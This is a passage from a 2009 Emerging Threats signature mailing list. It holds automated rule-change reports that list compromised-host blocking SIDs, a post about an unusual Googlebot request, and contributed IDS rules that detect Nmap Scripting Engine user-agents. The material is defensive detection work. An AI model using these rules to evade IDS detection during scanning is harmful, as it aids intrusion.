        2510266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (44):
        2006371 || ET MALWARE BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006371
        2006372 || ET MALWARE Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372
        2006375 || ET MALWARE Bittorrent P2P Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375
        2006379 || ET MALWARE BearShare P2P Gnutella Client HTTP Request  || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379
        2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From pepperjack at afferentsecurity.com  Fri May 22 09:30:10 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Fri, 22 May 2009 08:30:10 -0500
Subject: [Emerging-Sigs] unicode uri content
Message-ID: <20090522083010.g4tsolte04ks440c@mail.afferentsecurity.com>


Picked this up last night.  It's not dangerous, and it really did come  
from google.  but what is going on?  As near as I can see, they are  
looking for chinese characters in the uri ( ? )

GET /?ref=%C4%B0lkSexShop.Com HTTP/1.1
Host: www.pi.ourcity.state.us
Connection: Keep-alive
Accept: */*
From: googlebot(at)googlebot.com
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1;  
+http://www.google.com/bot.html)
Accept-Encoding: gzip,deflate
If-Modified-Since: Fri, 15 May 2009 19:28:49 GMT


jp

-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From jaime.blasco at alienvault.com  Fri May 22 10:04:45 2009
From: jaime.blasco at alienvault.com (Jaime Blasco)
Date: Fri, 22 May 2009 16:04:45 +0200
Subject: [Emerging-Sigs] nmap scripting engine usder-agent
Message-ID: <53834cf20905220704o2715ad03u2e2d1bfbe110b3f2@mail.gmail.com>

Hi, some rules to detect nmap scripting engine common user-agents:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap
Scripting Engine User-Agent Detected (1)"; flow:to_server,established;
content:"|0d 0a|User-Agent|3a| Nmap NSE"; classtype:web-application-attack;
sid:; rev:1;)
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap
Scripting Engine User-Agent Detected (2)"; flow:to_server,established;
content:"|0d 0a|User-Agent|3a| Mozilla/5.0 (compatible|3b| Nmap Scripting
Engine"; nocase;  classtype:web-application-attack; sid:; rev:1;)


Regards
-- 
_______________________________

Jaime Blasco

www.ossim.com
www.alienvault.com
Email: jaime.blasco at alienvault.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090522/38ea5467/attachment.html

From jonkman at jonkmans.com  Fri May 22 11:38:43 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 22 May 2009 11:38:43 -0400
Subject: [Emerging-Sigs] nmap scripting engine usder-agent
In-Reply-To: <53834cf20905220704o2715ad03u2e2d1bfbe110b3f2@mail.gmail.com>
References: <53834cf20905220704o2715ad03u2e2d1bfbe110b3f2@mail.gmail.com>
Message-ID: <4A16C703.1040700@jonkmans.com>

Nice! Posting now. Thanks Jaime.

Matt

Jaime Blasco wrote:
> Hi, some rules to detect nmap scripting engine common user-agents:
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap
> Scripting Engine User-Agent Detected (1)"; flow:to_server,established;
> content:"|0d 0a|User-Agent|3a| Nmap NSE";
> classtype:web-application-attack; sid:; rev:1;)
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB Nmap
> Scripting Engine User-Agent Detected (2)"; flow:to_server,established;
> content:"|0d 0a|User-Agent|3a| Mozilla/5.0 (compatible|3b| Nmap
> Scripting Engine"; nocase;  classtype:web-application-attack; sid:; rev:1;)
> 
> 
> Regards
> -- 
> _______________________________
> 
> Jaime Blasco
> 
> www.ossim.com <http://www.ossim.com>
> www.alienvault.com <http://www.alienvault.com>
> Email: jaime.blasco at alienvault.com <mailto:jaime.blasco at alienvault.com>
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



From emerging at emergingthreats.net  Fri May 22 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 22 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090522200011.884DC4504C@goliath.jonkmans.com>


[***] Results from Oinkmaster started Fri May 22 16:00:11 2009 [***]

[+++]          Added rules:          [+++]

 2009358 - ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap Scripting Engine) (emerging-scan.rules)
 2009359 - ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap NSE) (emerging-scan.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-scan.rules (1):
        #by Jaime Blasco

     -> Added to emerging-sid-msg.map (2):
        2009358 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap Scripting Engine)
        2009359 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap NSE)

     -> Added to emerging-sid-msg.map.txt (2):
        2009358 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap Scripting Engine)
        2009359 || ET SCAN Nmap Scripting Engine User-Agent Detected (Nmap NSE)

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (60):
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (60):
        2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
